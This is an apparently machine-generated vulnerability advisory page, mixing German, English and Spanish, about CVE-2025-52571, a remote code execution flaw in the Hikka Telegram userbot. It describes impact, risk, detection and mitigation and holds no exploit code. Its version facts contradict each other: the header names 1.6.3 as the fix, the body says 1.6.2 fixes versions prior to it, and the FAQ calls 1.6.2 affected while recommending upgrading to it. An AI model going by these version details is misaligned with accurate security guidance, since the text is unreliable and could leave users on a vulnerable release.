Hikka vulnerable to RCE through edits in a channel
wird übersetzt…Plattform
python
Komponente
hikariatama/hikka
Behoben in
1.6.3
CVE-2025-52571 describes a Remote Code Execution (RCE) vulnerability within Hikka, a Telegram userbot. This vulnerability allows an unauthenticated attacker to compromise a victim's Telegram account and gain full access to the server hosting the userbot. The vulnerability impacts versions of Hikka and its forks prior to 1.6.2, and a patch has been released in version 1.6.2.
Erkenne diese CVE in deinem Projekt
Lade deine requirements.txt-Datei hoch und wir sagen dir sofort, ob du betroffen bist.
Auswirkungen und Angriffsszenarienwird übersetzt…
The impact of this vulnerability is severe. An attacker can leverage it to completely take over a victim's Telegram account, potentially accessing sensitive information, sending messages as the victim, and performing actions on their behalf. Furthermore, the attacker gains full access to the server hosting the Hikka userbot, enabling them to execute arbitrary code, steal data, install malware, or pivot to other systems on the network. This represents a significant security risk, especially if the server hosts other sensitive applications or data.
Ausnutzungskontextwird übersetzt…
This vulnerability was publicly disclosed on 2025-06-24. There are currently no known public exploits or active campaigns targeting CVE-2025-52571. The vulnerability's severity (CVSS 9.7) indicates a high probability of exploitation if left unpatched. It is not currently listed on the CISA KEV catalog.
Wer Ist Gefährdetwird übersetzt…
Users of Hikka Telegram userbot, particularly those running versions prior to 1.6.2, are at significant risk. This includes individuals and organizations utilizing Hikka for automated Telegram tasks or bot development. Shared hosting environments where multiple users share the same server are also at increased risk, as a compromise of one user's Hikka instance could potentially lead to broader system compromise.
Erkennungsschrittewird übersetzt…
• python / server:
ps aux | grep hikka• python / server: Check for unusual processes running under the Hikka user account. • python / server: Examine system logs for suspicious commands or network connections originating from the Hikka userbot. • python / server: Monitor for unauthorized Telegram account activity associated with the affected server.
Angriffszeitlinie
- Disclosure
disclosure
Bedrohungsanalyse
Exploit-Status
EPSS
0.18% (40% Perzentil)
CISA SSVC
CVSS-Vektor
Was bedeuten diese Metriken?
- Attack Vector
- Netzwerk — aus der Ferne über das Internet ausnutzbar. Kein physischer oder lokaler Zugriff erforderlich.
- Attack Complexity
- Niedrig — keine besonderen Bedingungen erforderlich. Zuverlässig ausnutzbar.
- Privileges Required
- Keine — ohne Authentifizierung ausnutzbar. Keine Zugangsdaten erforderlich.
- User Interaction
- Erforderlich — Opfer muss eine Datei öffnen, auf einen Link klicken oder eine Seite besuchen.
- Scope
- Geändert — Angriff kann über die anfällige Komponente hinaus auf andere Systeme übergreifen.
- Confidentiality
- Hoch — vollständiger Vertraulichkeitsverlust. Angreifer kann alle Daten lesen.
- Integrity
- Hoch — Angreifer kann beliebige Daten schreiben, ändern oder löschen.
- Availability
- Hoch — vollständiger Absturz oder Ressourcenerschöpfung. Totaler Denial of Service.
Betroffene Software
Schwachstellen-Klassifikation (CWE)
Zeitleiste
- Reserviert
- Veröffentlicht
- EPSS aktualisiert
Mitigation und Workaroundswird übersetzt…
The primary mitigation for CVE-2025-52571 is to immediately upgrade Hikka to version 1.6.2 or later. Due to the nature of the RCE vulnerability, there are no known workarounds beyond upgrading. Ensure that automatic updates are enabled if possible to prevent future exploitation. After upgrading, verify the integrity of the installation by checking the version number and reviewing system logs for any suspicious activity.
So behebenwird übersetzt…
Actualice Hikka a la versión 1.6.2 o superior. Esta versión contiene la corrección de seguridad que previene la ejecución remota de código. La actualización se puede realizar mediante el gestor de paquetes utilizado para instalar Hikka.
CVE-Sicherheitsnewsletter
Schwachstellenanalysen und kritische Warnungen direkt in deinen Posteingang.
Häufig gestellte Fragenwird übersetzt…
What is CVE-2025-52571 — Remote Code Execution in Hikka Telegram Userbot?
CVE-2025-52571 is a critical RCE vulnerability affecting Hikka Telegram userbots versions 1.6.2 and earlier, allowing attackers to gain control of accounts and servers.
Am I affected by CVE-2025-52571 in Hikka Telegram Userbot?
You are affected if you are using Hikka version 1.6.2 or earlier. Upgrade to 1.6.2 immediately to mitigate the risk.
How do I fix CVE-2025-52571 in Hikka Telegram Userbot?
Upgrade Hikka to version 1.6.2 or later. There are no known workarounds besides upgrading.
Is CVE-2025-52571 being actively exploited?
Currently, there are no confirmed reports of active exploitation, but the high severity score suggests a potential for future attacks.
Where can I find the official Hikka advisory for CVE-2025-52571?
Refer to the official Hikka project repository or website for the latest security advisories and release notes.
Ist dein Projekt betroffen?
Lade deine Abhängigkeitsdatei hoch und erfahre sofort, ob dich diese und andere CVEs treffen.